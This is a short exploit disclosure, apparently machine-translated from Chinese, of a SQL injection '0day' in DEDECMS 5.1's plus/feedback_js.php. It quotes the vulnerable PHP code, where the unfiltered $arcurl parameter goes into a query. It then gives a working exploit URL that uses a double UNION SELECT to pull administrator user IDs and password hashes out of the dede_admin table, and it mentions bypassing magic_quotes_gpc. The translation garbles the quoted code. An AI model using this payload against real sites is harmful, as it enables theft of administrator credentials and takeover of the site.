DEDECMS 5.1 feedback_js.php 0DAY

Author: st0p RainyFox
Please indicate the source of reprint: http://www.st0p.org http://bbs.erpangzi.com/

This vulnerability was discovered by RainyFox and I.
It is also available when magic_quotes_gpc = off

Vulnerability version: DEDECMS 5.1
This vulnerability can be obtained from the background administrator's account and encrypted HASH. The vulnerability exists in the file plus/feedback_js.php, And the unfiltered parameter is $ arcurl.

......
$ Urlindex = 0;
If (empty ($ arcID ))
{
$ Row = $ dlist-> dsql-> GetOne ("Select id From 'dede _ cache_feedbackurl 'where url = $ arcurl ");
// $ Arcurl is not filtered here
If (is_array ($ row) $ urlindex = $ row [id];
// If the result exists, $ urlindex is assigned as the queried $ row [id]. We can construct an SQL statement and import it to the following operations.
}
If (empty ($ arcID) & empty ($ urlindex) exit ();
// Exit if $ arcID is empty or $ urlindex is empty
......
If (empty ($ arcID) $ wq = "urlindex = $ urlindex ";
// We leave $ arcID empty. The result of the preceding execution will be assigned to $ wq for execution in the following operations.
Else $ wq = "aid = $ arcID ";
$ Querystring = "select * from 'dede _ feedback' where $ wq and ischeck = 1 order by dtime desc ";
$ Dlist-> Init ();
$ Dlist-> SetSource ($ querystring );
......

Let's take a look at the method. Hey, I used union twice to close it.

Http: // st0p/dedecms51/plus/feedback_js.php? Arcurl = union select "and 1 = 2 union select, 1, userid, pwd, 1, 1 from dede_admin where 1 = 1 union select * from dede_feedback where 1 = 2 and = "from dede_admin where =

 

Alas, when I was looking for a target test with the guy RainyFox, he said that he could pass through the magic_quotes_gpc = on .... this idea is too YD .. it's terrible. It can be implemented. This network field should be messy. Many programs call their own escape part only when magic_quotes_gpc is disabled by default in PHP... it's a nightmare of the PHP program...